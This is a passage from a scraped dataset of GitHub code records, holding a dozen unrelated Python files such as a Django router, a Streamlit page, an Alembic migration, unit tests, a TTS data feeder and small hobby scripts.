{estimatePi(n)}')","repo_name":"FrostyPqnda/Coding-Projects","sub_path":"Python/EstimatePi.py","file_name":"EstimatePi.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"41197576938","text":"from django.urls import include, path\n\nfrom rest_framework import routers\nfrom . import views\n\nfrom my_awesome_api.views import AccountViewSet, DestinationViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'people', AccountViewSet)\nrouter.register(r'Destination', DestinationViewSet)\n\nurlpatterns = [\n path('', include(router.urls)),\n path('Add_account/',views.add_Account, name='Add-account'),\n path('add_destination/',views.add_Destination, name='add-Destination'),\n path('view_account/', views.view_Account, name='view_account'),\n path('view_destination/', views.view_Destination, name='view_destination'),\n path('update_account/<int:pk>/', views.update_Account, name='update-Account'),\n path('update_destination/<int:pk>/', views.update_Destination, name='update-destination'),\n path('delete_account/delete/<int:pk>', views.delete_Account, name='delete-Account'),\n path('delete_destination/delete/<int:pk>', views.delete_Destination, name='delete-destination'),\n path('urls_destination/<int:pk>', views.url_destionation, name='account_detail')\n \n]","repo_name":"syedpmsa/pythonsource","sub_path":"my_awesome_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17324160336","text":"import streamlit as st\n\ntitle = \"Introduction\"\nsidebar_name = \"Introduction\"\n\ndef run():\n\n st.title(title)\n\n st.header('La brigade de pompiers de Londres :')\n st.markdown(\n \"\"\"\n - Fondée en 1865\n - 113 casernes réparties sur l'ensemble de la capitale\n - ~ 150 000 appels d'urgence par année\n - Type d'interventions : incendies, inondations, collisions routières\n \"\"\"\n )\n\n st.header('Enjeux du projet :')\n st.markdown(\n \"\"\"\n - Modéliser le temps de réponse des pompiers\n - Possibilité de proposer des actions pour améliorer le temps de réponse :\n * Ouverture de nouvelles casernes\n * Allocation d'une unité à une autre caserne\n \"\"\"\n )\n\n st.header('Méthodes utilisées')\n st.markdown(\n \"\"\"\n - Analyse de données (Pandas, Matplotlib, Seaborn)\n - Modélisation du temps de réponse via des modèles de machine learning (Scikit-Learn)\n \"\"\"\n )\n","repo_name":"djdevpro/Soutenance","sub_path":"tabs/introduction.py","file_name":"introduction.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39719731131","text":"\"\"\"automatic_collections\n\nRevision ID: e46b30dd3ff5\nRevises: 9e33fa16ba82\nCreate Date: 2023-02-06 11:44:29.000880\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'e46b30dd3ff5'\ndown_revision = '9e33fa16ba82'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n \"automatic_collection\",\n sa.Column(\n 'collection_id',\n sa.Integer,\n sa.ForeignKey('collections.id', ondelete='CASCADE'),\n primary_key=True,\n ),\n sa.Column(\n 'keyword_query',\n sa.String,\n ),\n sa.Column(\n 'author_query',\n sa.String,\n ),\n sa.Column(\n 'title_query',\n sa.String,\n ),\n sa.Column(\n 'subject_query',\n sa.String,\n ),\n sa.Column(\n 'sort_field',\n sa.String,\n sa.CheckConstraint(r\"sort_field IN ('uuid', 'title', 'author', 'date')\"),\n server_default='uuid',\n nullable=False,\n ),\n sa.Column(\n 'sort_direction',\n sa.String,\n sa.CheckConstraint(r\"sort_direction IN ('ASC', 'DESC')\"),\n server_default='ASC',\n nullable=False,\n ),\n sa.Column(\n 'limit',\n sa.Integer,\n sa.CheckConstraint(r'\"limit\" IS NULL OR \"limit\" > 0'),\n ),\n )\n collection_type = postgresql.ENUM('static', 'automatic', name=\"collection_type\")\n collection_type.create(op.get_bind(), checkfirst=True)\n op.add_column(\n 'collections',\n sa.Column(\n \"type\",\n collection_type,\n server_default=\"static\",\n nullable=False,\n ),\n )\n\n\ndef downgrade():\n op.drop_column(\"collections\", \"type\")\n op.drop_table(\"automatic_collection\")\n collection_type = postgresql.ENUM('static', 'automatic', name=\"collection_type\")\n collection_type.drop(op.get_bind())\n","repo_name":"NYPL/drb-etl-pipeline","sub_path":"migrations/versions/e46b30dd3ff5_automatic_collections.py","file_name":"e46b30dd3ff5_automatic_collections.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"22860632322","text":"from unittest import TestCase\nfrom entities.reimbursement import Reimbursement\nfrom exceptions.invalid_param_exception import InvalidParamError\n\nreimburse: Reimbursement = Reimbursement(500, \"Need help\", \"Sure\")\nreimburse_second: Reimbursement = Reimbursement(1000, \"Also need help\", \"Sure\")\n\n\ndef test_get_amount():\n assert reimburse.get_amount() == 500\n\n\ndef test_get_reason():\n assert reimburse.get_reason() == \"Need help\"\n\n\ndef test_get_response():\n assert reimburse.get_response() == \"Sure\"\n\n\ndef test_get_id():\n assert reimburse.get_id() == 0\n\n\ndef test_get_owner_id():\n assert reimburse.get_owner_id() == 0\n\n\ndef test_get_status():\n assert reimburse.get_status() == 0\n\n\ndef test_set_id():\n reimburse.set_id(1)\n assert reimburse.get_id() == 1\n reimburse.set_id(2)\n assert reimburse.get_id() == 1\n\n\ndef test_set_owner_id():\n reimburse.set_owner_id(1)\n assert reimburse.get_id() == 1\n reimburse.set_owner_id(2)\n assert reimburse.get_id() == 1\n\n\ndef test_set_status():\n reimburse.set_status(1, -1)\n assert not reimburse.is_denied()\n assert reimburse.is_pending()\n reimburse.set_status(2, 1)\n assert not reimburse.is_pending()\n assert reimburse.is_approved()\n reimburse.set_status(2, -1)\n assert reimburse.is_approved()\n\n\ndef test_set_response():\n reimburse.set_response(1, \"I refuse\")\n assert not reimburse.get_response() == \"I refuse\"\n reimburse.set_response(2, \"Sure you need it\")\n assert reimburse.get_response() == \"Sure you need it\"\n\n\ndef test_to_json_dict():\n new_json = {\n \"id\": 1,\n \"amount\": 500,\n \"reason\": \"Need help\",\n \"owner\": 1,\n \"status\": 1,\n \"response\": \"Sure you need it\"\n }\n TestCase().assertDictEqual(new_json, reimburse.to_json_dict())\n\n\ndef test_set_from_json_fail():\n # Missing amount\n new_json = {\n \"reason\": \"Need help\",\n \"owner\": 1\n }\n try:\n reimburse.set_from_json(1, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n # Missing reason\n new_json = {\n \"amount\": 1000,\n \"owner\": 1\n }\n try:\n reimburse.set_from_json(1, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n # Missing owner id\n new_json = {\n \"reason\": \"Need help\",\n \"amount\": 1000\n }\n try:\n reimburse.set_from_json(1, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n\ndef test_set_from_json_invalid():\n # Invalid amount\n new_json = {\n \"amount\": \"a letter\",\n \"reason\": \"Need help\",\n \"owner\": 1\n }\n try:\n reimburse.set_from_json(1, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n # Invalid owner\n new_json = {\n \"amount\": 1000,\n \"reason\": \"Need help\",\n \"owner\": \"a letter\"\n }\n try:\n reimburse.set_from_json(1, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n\ndef test_set_from_json_invalid_status():\n new_json = {\n \"amount\": 1000,\n \"reason\": \"Need help\",\n \"owner\": 1,\n \"status\": \"a letter\"\n }\n try:\n reimburse_second.set_from_json(2, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n new_json = {\n \"amount\": 1000,\n \"reason\": \"Need help\",\n \"owner\": 1,\n \"status\": 200000000\n }\n try:\n reimburse_second.set_from_json(2, new_json)\n assert False\n except InvalidParamError:\n assert True\n\n\ndef test_set_from_json_pass():\n new_json = {\n \"amount\": 100,\n \"reason\": \"Need help*\",\n \"owner\": 3,\n \"status\": 1,\n \"response\": \"Sure\"\n }\n reimburse_second.set_from_json(2, new_json)\n assert reimburse_second.get_amount() == new_json[\"amount\"]\n assert reimburse_second.is_approved()\n assert reimburse_second.get_reason() == new_json[\"reason\"]\n assert reimburse_second.get_response() == new_json[\"response\"]\n assert reimburse_second.get_owner_id() == new_json[\"owner\"]\n","repo_name":"rtaylor4444/Revature-Project-1","sub_path":"Project 1/tests/reimbursement_test.py","file_name":"reimbursement_test.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70811199786","text":"from abc import ABC, abstractmethod\n\nfrom mcstatus import JavaServer\nfrom pydantic import BaseModel\n\n\nclass JavaPingTimeoutError(Exception):\n pass\n\n\nclass JavaPingRefusedError(Exception):\n pass\n\n\nclass JavaPingResultPlayer(BaseModel):\n id: str\n name: str\n\n\nclass JavaPingResult(BaseModel):\n version_protocol: int\n version_name: str\n latency: float\n players_online: int\n players_max: int\n players_sample: list[JavaPingResultPlayer]\n description: str\n favicon: str | None # Data URL\n\n\nclass JavaPingRepository(ABC):\n @abstractmethod\n def ping(self, host: str, port: int, timeout: float) -> JavaPingResult:\n ...\n\n\nclass JavaPingRepositoryImpl(JavaPingRepository):\n def ping(self, host: str, port: int, timeout: float) -> JavaPingResult:\n try:\n server = JavaServer.lookup(address=f\"{host}:{port}\", timeout=timeout)\n response = server.status()\n\n # sample is None when no player logged in\n players_sample = (\n response.players.sample if response.players.sample is not None else []\n )\n\n return JavaPingResult(\n version_protocol=response.version.protocol,\n version_name=response.version.name,\n latency=response.latency,\n players_online=response.players.online,\n players_max=response.players.max,\n players_sample=list(\n map(\n lambda player_sample: JavaPingResultPlayer(\n id=player_sample.id,\n name=player_sample.name,\n ),\n players_sample,\n )\n ),\n description=response.description,\n favicon=response.favicon,\n )\n except TimeoutError:\n raise JavaPingTimeoutError\n except ConnectionRefusedError:\n raise JavaPingRefusedError\n","repo_name":"aoirint/aoirint_mcping_server","sub_path":"aoirint_mcping_server/lib/repository/java_ping_repository.py","file_name":"java_ping_repository.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13023089749","text":"from mo.graph.graph import Graph\nfrom mo.middle.replacement import MiddleReplacementPattern\n\n\nclass RemoveUselessConcatSplitPattern(MiddleReplacementPattern):\n \"\"\"\n Remove useless construction with concat and split like follows:\n / / | \\ \\\n br1 br2 .. br(n-1)br(n)\n \\ \\ | / /\n concat\n |\n split\n / / | \\ \\\n br1 br2 .. br(n-1)br(n)\n\n \"\"\"\n enabled = True\n force_clean_up = True\n\n def run_after(self):\n from extensions.middle.ReplaceSpliceNodePattern import ReplaceSpliceNodePattern\n return [ReplaceSpliceNodePattern]\n\n @staticmethod\n def pattern():\n return dict(\n nodes=[('concat', dict(op='Concat')),\n ('data', dict(kind='data')),\n ('split', dict(op='Split'))],\n edges=[('concat', 'data'),\n ('data', 'split')])\n\n @staticmethod\n def replace_pattern(graph: Graph, match: dict):\n concat_node = match['concat']\n split_node = match['split']\n\n # don't apply pass if concat have another outputs except split\n if len(concat_node.out_port(0).get_destinations()) != 1:\n return\n\n inputs = list(concat_node.in_ports().values())\n outputs = list(split_node.out_ports().values())\n\n if len(inputs) != len(outputs):\n return\n\n for i in range(len(inputs)):\n if not all(inputs[i].data.get_shape() == outputs[i].data.get_shape()):\n return\n\n for i in range(len(inputs)):\n outputs[i].get_connection().set_source(inputs[i].get_source())\n inputs[i].disconnect()\n","repo_name":"Namptiter/OpenVINO-Darknet-YOLOv3","sub_path":"model_optimizer/extensions/middle/RemoveUselessConcatSplit.py","file_name":"RemoveUselessConcatSplit.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28011113393","text":"\n\ndef main():\n user={\n \"user_info\": [input(\"Welcome to our Apple Nutrition checker app, lets get you started by getting to know your Name: \"),input(\"Gender: \"),int(input(\"Age \")),int(input(\"Weight(kg): \"))],\n \"user_nutri\":[ int(input(\"Daily Calorie Goal(kcal): \")),int(input(\"Daily Protein Goal(g): \")),int(input(\"Daily Fat Budget(g): \")),int(input(\"Is your goal a calorie Surplus or Deficit\"))]\n }\n #exercise / hour\n exercise={\n \"sleeping\":60,\n \"eating\":90,\n \"standing\":100,\n \"driving\":110,\n \"housework\":140,\n \"walking\":180,\n \"dancing\":220,\n \"running\": 320,\n \"aerobics\": 420,\n \"cycling\": 560,\n \"lifting\": 520,\n \"tenis\": 470,\n \"swimming\": 620,\n \"jogging\": 700,\n \"basketball\": 600,\n \n \n \n }\n #serving size 100g\n fruit={\n \"apple\":[130,1,0],\n \"banana\":[105,1,0],\n \"orange\":[35,1,0],\n \"pear\":[100,1,0],\n \"peach\":[69,2,0],\n \"grapefruit\":[52,1,0],\n \"apricot\":[17,0,0],\n \"passion_fruit\":[19,0,0],\n \"cherry\":[130,1,0],\n \"strawberry\":[32,1,3],\n \"mango\":[65,1,0],\n \"pineapple\":[278,5,1]\n }\n hi_pro={\n \"beef\":[127,20,10],\n \"chicken\":[120,26,2],\n \"salmon\":[180,20,10],\n \"tuna\":[100,13,6],\n \"cottage cheese\":[90,13,1],\n \"greek yogurt\":[101,5,3],\n \"cheese\":[110,8,10],\n \"egg\":[70,6,5],\n \"beans\":[157,4,9],\n \"milk\":[130,8,5],\n }\n\n \n \n \n \n \n \n cal_in=0\n pro_in=0\n fat_in=0\n #Input calories intake\n for x in range(int(input(\"How many types of food have you eaten?\\n\"))):\n inc=input(\"What food have you eaten? \\n\")\n if inc.lower() in fruit or hi_pro:\n count=int(input(\"How many serving of \"+inc+\" have you eaten? \"))\n if inc.lower() in fruit:\n \n cal_in+= (fruit[inc][0]*count)\n pro_in+= (fruit[inc][1]*count)\n fat_in+= (fruit[inc][2]*count)\n elif inc.lower() in hi_pro:\n cal_in+= (hi_pro[inc][0]*count)\n pro_in+= (hi_pro[inc][1]*count)\n fat_in+= (hi_pro[inc][2]*count)\n else:\n print(\"Our app does not have database for such food.\")\n print(\"Total calories intake: \"+str(cal_in)+\"\\nTotal protein intake: \"+str(pro_in)+\"\\nTotal fat intake: \"+str(fat_in))\n \n cal_burn=0\n #Input activity to burn calories\n for x in range(int(input(\"How many activities have you done?\\n\"))):\n inp=input(\"What activities have you accomplished? \\n\")\n if inp.lower() in exercise:\n cal_burn+= (exercise[inp]*int(input(\"How much hours did you do that activity? \\n\")))\n else:\n print(\"Our app does not have database for such activity.\")\n print(\"Total calories burned: \"+str(cal_burn))\n \n # caloriesmeter and determine if the user havent meet their calorie goals\n if cal_in>cal_burn:\n if (user[\"user_nutri\"][3]).lower()!=\"surplus\":\n print(\"Warning. You are currently in a calorie surplus of \"+str(cal_in-cal_burn)+\" calories\")\n \n else:\n print(\"Fantastic. You are currently in a calorie surplus of \"+str(cal_in-cal_burn)+\" calories\")\n elif cal_in<cal_burn:\n if (user[\"user_nutri\"][3]).lower()==\"surplus\":\n print(\"Warning. You are currently in a calorie deficit of \"+str(cal_in-cal_burn)+\" calories\")\n else:\n print(\"Fantastic. You are currently in a calorie deficit of \"+str(cal_in-cal_burn)+\" calories\")\n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \nmain()\n","repo_name":"huyhuynh1105/Huy-Huynh-s-Projects","sub_path":"Nutrition Tracker Application.py","file_name":"Nutrition Tracker Application.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3676940369","text":"from .db_config import (cursor, lock)\n\ndef column(table_name:str, column:str):\n \"\"\" ترجع لك جميع القيم التي في العامود المعطى\n المتغيرات:\n table_name (str): اسم الجدول اذي يوجد فيه العامود\n column (str): اسم العامود الذي تريد اسخراج جميع القيم التي به\n المخرجات:\n list: قائمة من عناصر العامود\n \"\"\"\n try:\n lock.acquire(True)\n cursor.execute(f\"SELECT {column} FROM {table_name}\")\n return list(map(\n lambda val: str(val).replace('<br>', '\\n'),\n [val for table in cursor.fetchall() for val in table]\n ))\n finally:\n lock.release()","repo_name":"TheAwiteb/randomChat","sub_path":"db/column.py","file_name":"column.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"ar","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"69827201069","text":"import tensorflow as tf;\r\nimport numpy as np;\r\nimport _pickle as pickle;\r\nfrom collections import deque;\r\nfrom random import shuffle;\r\nfrom threading import Thread;\r\nimport os, time, librosa, json;\r\nimport Hyper_Parameters as hp;\r\nfrom Audio import melspectrogram\r\n\r\nclass Feeder:\r\n def __init__(\r\n self,\r\n is_Training= False\r\n ):\r\n self.is_Training = is_Training;\r\n\r\n self.Placeholder_Generate();\r\n self.Metadata_Load();\r\n\r\n if self.is_Training:\r\n if hp.Train.Use_Pre_in_Main_Train:\r\n self.pre_Pattern_Queue = deque();\r\n pre_Pattern_Generate_Thread = Thread(target=self.Train_Pattern_Generate, args=[True]);\r\n pre_Pattern_Generate_Thread.daemon = True;\r\n pre_Pattern_Generate_Thread.start();\r\n\r\n self.pattern_Queue = deque();\r\n pattern_Generate_Thread = Thread(target=self.Train_Pattern_Generate, args=[False]);\r\n pattern_Generate_Thread.daemon = True;\r\n pattern_Generate_Thread.start();\r\n\r\n def Placeholder_Generate(self):\r\n self.placeholder_Dict = {};\r\n with tf.variable_scope('placeholders') as scope:\r\n self.placeholder_Dict[\"Is_Training\"] = tf.placeholder(tf.bool, name=\"is_training_placeholder\"); #boolean \r\n self.placeholder_Dict[\"Token\"] = tf.placeholder(tf.int32, shape=(None, None, ), name=\"token_placeholder\"); #Shape: [batch_Size, spectrogram_Length, mel_Spectogram_Dimension];\r\n self.placeholder_Dict[\"Token_Length\"] = tf.placeholder(tf.int32, shape=(None,), name=\"token_length_placeholder\"); #[batch_Size];\r\n self.placeholder_Dict[\"Mel\"] = tf.placeholder(tf.float32, shape=(None, None, hp.Sound.Mel_Dim), name=\"mel_placeholder\"); #Shape: [batch_Size, spectrogram_Length, mel_Spectogram_Dimension];\r\n self.placeholder_Dict[\"Mel_Length\"] = tf.placeholder(tf.int32, shape=(None,), name=\"mel_length_placeholder\"); #[batch_Size];\r\n self.placeholder_Dict['Speaker_Embedding_Mel'] = tf.placeholder(tf.float32, shape=(None, None, hp.Sound.Mel_Dim), name='speaker_embedding_mel_placeholder'); #Shape: [batch_Size, spectrogram_Length, mel_Spectogram_Dimension];\r\n \r\n def Metadata_Load(self):\r\n if self.is_Training:\r\n with open(os.path.join(hp.Train.Pattern_Path, hp.Train.Metadata_File.upper()).replace(\"\\\\\", \"/\"), 'rb') as f:\r\n self.metadata_Dict = pickle.load(f)\r\n\r\n if not all([\r\n len(self.metadata_Dict['Token_Index_Dict']) == hp.Encoder.Embedding.Token_Size,\r\n self.metadata_Dict['Spectrogram_Dim'] == hp.Sound.Spectrogram_Dim,\r\n self.metadata_Dict['Mel_Dim'] == hp.Sound.Mel_Dim,\r\n self.metadata_Dict['Frame_Shift'] == hp.Sound.Frame_Shift,\r\n self.metadata_Dict['Frame_Length'] == hp.Sound.Frame_Length,\r\n self.metadata_Dict['Sample_Rate'] == hp.Sound.Sample_Rate,\r\n ]):\r\n raise ValueError('The metadata information and hyper parameter setting are not consistent.')\r\n\r\n else:\r\n with open('Token_Index_Dict.json', 'r') as f:\r\n self.metadata_Dict = {'Token_Index_Dict': json.load(f)}\r\n\r\n def Speaker_Embedding_Mel(self, mel_List):\r\n required_Mel_Length = \\\r\n hp.Speaker_Embedding.Inference.Sample_Nums * (hp.Speaker_Embedding.Inference.Mel_Frame - hp.Speaker_Embedding.Inference.Overlap_Frame) + \\\r\n hp.Speaker_Embedding.Inference.Overlap_Frame\r\n\r\n new_Mel_Pattern = np.zeros(\r\n (\r\n len(mel_List),\r\n hp.Speaker_Embedding.Inference.Sample_Nums,\r\n hp.Speaker_Embedding.Inference.Mel_Frame,\r\n hp.Sound.Mel_Dim\r\n ),\r\n dtype=np.float32\r\n )\r\n\r\n for index, mel in enumerate(mel_List):\r\n if mel.shape[0] < required_Mel_Length:\r\n #All sample is same because the mel length is too short.\r\n sample_Mel = mel[:hp.Speaker_Embedding.Inference.Mel_Frame]\r\n new_Mel_Pattern[index, :, :sample_Mel.shape[0]] = sample_Mel\r\n else:\r\n for sample_Index in range(hp.Speaker_Embedding.Inference.Sample_Nums):\r\n start_Point = int((mel.shape[0] - required_Mel_Length) / 2) + sample_Index * hp.Speaker_Embedding.Inference.Overlap_Frame #Middle of mel\r\n new_Mel_Pattern[index, sample_Index] = mel[start_Point:start_Point + hp.Speaker_Embedding.Inference.Mel_Frame]\r\n\r\n return np.reshape(new_Mel_Pattern, (-1, hp.Speaker_Embedding.Inference.Mel_Frame, hp.Sound.Mel_Dim))\r\n \r\n def Train_Pattern_Generate(self, is_Pre_Train = False):\r\n if is_Pre_Train:\r\n file_List = [path for path in self.metadata_Dict['File_List'] if self.metadata_Dict['Dataset_Dict'][path] in hp.Train.Pre_Train_Dataset_List]\r\n pattern_Queue = self.pre_Pattern_Queue\r\n else:\r\n file_List = [path for path in self.metadata_Dict['File_List'] if self.metadata_Dict['Dataset_Dict'][path] in hp.Train.Main_Train_Dataset_List]\r\n pattern_Queue = self.pattern_Queue\r\n\r\n min_Mel_Length = hp.Train.Use_Wav_Length_Range[0] / hp.Sound.Frame_Shift\r\n max_Mel_Length = hp.Train.Use_Wav_Length_Range[1] / hp.Sound.Frame_Shift\r\n path_List = [\r\n (path, self.metadata_Dict['Mel_Length_Dict'][path])\r\n for path in file_List\r\n if self.metadata_Dict['Mel_Length_Dict'][path] >= min_Mel_Length and self.metadata_Dict['Mel_Length_Dict'][path] <= max_Mel_Length\r\n ]\r\n print(\r\n 'Pre train pattern info' if is_Pre_Train else 'Main train pattern info', '\\n',\r\n 'Total pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict'])), '\\n',\r\n 'Use pattern count: {}'.format(len(path_List)), '\\n',\r\n 'Excluded pattern count: {}'.format(len(self.metadata_Dict['Mel_Length_Dict']) - len(path_List))\r\n )\r\n\r\n if hp.Train.Pattern_Sorting_by_Mel_Length:\r\n path_List = [file_Name for file_Name, _ in sorted(path_List, key=lambda x: x[1])]\r\n else:\r\n path_List = [file_Name for file_Name, _ in path_List]\r\n\r\n while True:\r\n if not hp.Train.Pattern_Sorting_by_Mel_Length:\r\n shuffle(path_List)\r\n\r\n path_Batch_List = [\r\n path_List[x:x + hp.Train.Batch_Size]\r\n for x in range(0, len(path_List), hp.Train.Batch_Size)\r\n ]\r\n shuffle(path_Batch_List)\r\n #path_Batch_List = path_Batch_List[0:2] + list(reversed(path_Batch_List)) #Batch size의 적절성을 위한 코드. 10회 이상 되면 문제 없음\r\n\r\n batch_Index = 0;\r\n while batch_Index < len(path_Batch_List):\r\n if len(pattern_Queue) >= hp.Train.Max_Pattern_Queue:\r\n time.sleep(0.1);\r\n continue;\r\n\r\n pattern_Count = len(path_Batch_List[batch_Index]);\r\n\r\n token_List = []\r\n mel_List = []\r\n for file_Path in path_Batch_List[batch_Index]:\r\n with open(os.path.join(hp.Train.Pattern_Path, file_Path).replace(\"\\\\\", \"/\"), \"rb\") as f:\r\n pattern_Dict = pickle.load(f);\r\n \r\n token_List.append(np.hstack([\r\n self.metadata_Dict['Token_Index_Dict']['<S>'],\r\n pattern_Dict['Token'],\r\n self.metadata_Dict['Token_Index_Dict']['<E>']\r\n ]))\r\n mel_List.append(pattern_Dict['Mel'])\r\n\r\n max_Token_Length = max([token.shape[0] for token in token_List])\r\n max_Mel_Length = max([mel.shape[0] for mel in mel_List])\r\n\r\n new_Token_Pattern = np.zeros(\r\n shape=(pattern_Count, max_Token_Length),\r\n dtype= np.int32\r\n )\r\n new_Token_Pattern += self.metadata_Dict['Token_Index_Dict']['<E>'] #I think this is useless...\r\n new_Mel_Pattern = np.zeros(\r\n shape=(pattern_Count, max_Mel_Length, hp.Sound.Mel_Dim),\r\n dtype= np.float32\r\n )\r\n\r\n for pattern_Index, (token, mel) in enumerate(zip(token_List, mel_List)): \r\n new_Token_Pattern[pattern_Index, :token.shape[0]] = token;\r\n new_Mel_Pattern[pattern_Index, :mel.shape[0]] = mel;\r\n \r\n pattern_Queue.append({\r\n self.placeholder_Dict[\"Is_Training\"]: True,\r\n self.placeholder_Dict[\"Token\"]: new_Token_Pattern,\r\n self.placeholder_Dict[\"Token_Length\"]: np.array([token.shape[0] for token in token_List]).astype(np.int32),\r\n self.placeholder_Dict[\"Mel\"]: new_Mel_Pattern,\r\n self.placeholder_Dict[\"Mel_Length\"]: np.array([mel.shape[0] for mel in mel_List]).astype(np.int32),\r\n self.placeholder_Dict['Speaker_Embedding_Mel']: self.Speaker_Embedding_Mel(mel_List),\r\n })\r\n\r\n batch_Index += 1;\r\n\r\n def Get_Train_Pattern(self, is_Pre_Train = False):\r\n if is_Pre_Train:\r\n pattern_Queue = self.pre_Pattern_Queue\r\n else:\r\n pattern_Queue = self.pattern_Queue\r\n\r\n while len(pattern_Queue) == 0: #When training speed is faster than making pattern, model should be wait.\r\n time.sleep(0.01);\r\n return pattern_Queue.popleft();\r\n\r\n def Get_Inference_Pattern(self, speaker_Wav_Path_List, text_List):\r\n pattern_Count = len(text_List)\r\n\r\n token_List = [\r\n np.array(\r\n [self.metadata_Dict['Token_Index_Dict']['<S>']] +\r\n [self.metadata_Dict['Token_Index_Dict'][letter] for letter in text.upper()] +\r\n [self.metadata_Dict['Token_Index_Dict']['<E>']]\r\n ).astype(np.int32)\r\n for text in text_List\r\n ]\r\n\r\n max_Token_Length = max([token.shape[0] for token in token_List])\r\n\r\n new_Token_Pattern = np.zeros(\r\n shape=(pattern_Count, max_Token_Length),\r\n dtype= np.int32\r\n )\r\n new_Token_Pattern += self.metadata_Dict['Token_Index_Dict']['<E>'] #I think this is useless...\r\n new_Mel_Pattern = np.zeros(\r\n shape=(pattern_Count, 1, hp.Sound.Mel_Dim),\r\n dtype= np.float32\r\n )\r\n\r\n for pattern_Index, token in enumerate(token_List): \r\n new_Token_Pattern[pattern_Index, :token.shape[0]] = token;\r\n\r\n speaker_Embedding_Mel_List = [\r\n np.transpose(melspectrogram(\r\n y= librosa.effects.trim(librosa.core.load(path, sr = hp.Sound.Sample_Rate)[0], top_db=15, frame_length=32, hop_length=16)[0] * 0.99,\r\n num_freq= hp.Sound.Spectrogram_Dim,\r\n frame_shift_ms= hp.Sound.Frame_Shift,\r\n frame_length_ms= hp.Sound.Frame_Length,\r\n num_mels= hp.Sound.Mel_Dim,\r\n sample_rate= hp.Sound.Sample_Rate,\r\n max_abs_value= hp.Sound.Max_Abs_Mel\r\n ).astype(np.float32))\r\n for path in speaker_Wav_Path_List\r\n ]\r\n\r\n return {\r\n self.placeholder_Dict[\"Is_Training\"]: False,\r\n self.placeholder_Dict[\"Token\"]: new_Token_Pattern,\r\n self.placeholder_Dict[\"Token_Length\"]: np.array([token.shape[0] for token in token_List]).astype(np.int32),\r\n self.placeholder_Dict[\"Mel\"]: new_Mel_Pattern,\r\n self.placeholder_Dict[\"Mel_Length\"]: np.array([0 for _ in text_List]).astype(np.int32),\r\n self.placeholder_Dict['Speaker_Embedding_Mel']: self.Speaker_Embedding_Mel(speaker_Embedding_Mel_List), \r\n }","repo_name":"CODEJIN/multi_speaker_tts","sub_path":"Feeder.py","file_name":"Feeder.py","file_ext":"py","file_size_in_byte":12012,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"21066329788","text":"import math\n\nveelo = float(0)\ngravoo = 9.8\ntimeTot = 10\ntimeInc = .01\n\ni = 0\nwhile i != timeTot:\n veelo += gravoo * timeInc\n i += timeInc\n if i > timeTot:\n break\n\nprint(\"Averaged velocity: \", gravoo * timeTot)\nprint(\"Summed velocity: \", veelo)\n\n# test to see if velocity can be summed over time as well as averaged\n# essentially bruteforcing an integral\n","repo_name":"thespacemans/misc_stuff","sub_path":"FreefallCalc/piecemealtest.py","file_name":"piecemealtest.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18379361255","text":"import csv\nfrom sklearn import cluster\nimport numpy as np\n\nf = open('food.csv')\ncsv_f = csv.reader(f)\nval = [row for row in csv_f]\n\npoints = []\ncountries = []\nfor i in range(1,87):\n\tpoints.append(tuple(val[i][9:52]))\n\tcountries.append(val[i][0])\n\nn_class = 7\npoints = np.asarray(points)\nk_means_pp = cluster.KMeans(init='k-means++', n_clusters=n_class, n_init=5)\nk_means_pp.fit(points)\nlabels = k_means_pp.labels_\n\nfhabit = open('habit.txt','w')\nfor label in labels:\n\tfhabit.write('Habit'+str(label))\n\tfhabit.write('\\n')\n\nfhabit.close()\nf.close()","repo_name":"ydst22502/HKU-visualization","sub_path":"food_k_means.py","file_name":"food_k_means.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70580686829","text":"# 1. Find the highest rated movie in the“Quest” story type.\n\nimport pandas as pd\n\ndf = pd.read_csv('HollywoodMovies.csv')\n\nhighest_rate = df[df[\"Story\"] == \"Quest\"][\"RottenTomatoes\"].max()\n\nhighest_rated_movies = df[df[\"RottenTomatoes\"] == highest_rate]\n\nprint(highest_rated_movies)\n","repo_name":"JangirSumit/data_science","sub_path":"19th May Assignments/case study 1/question_1.py","file_name":"question_1.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"37"} 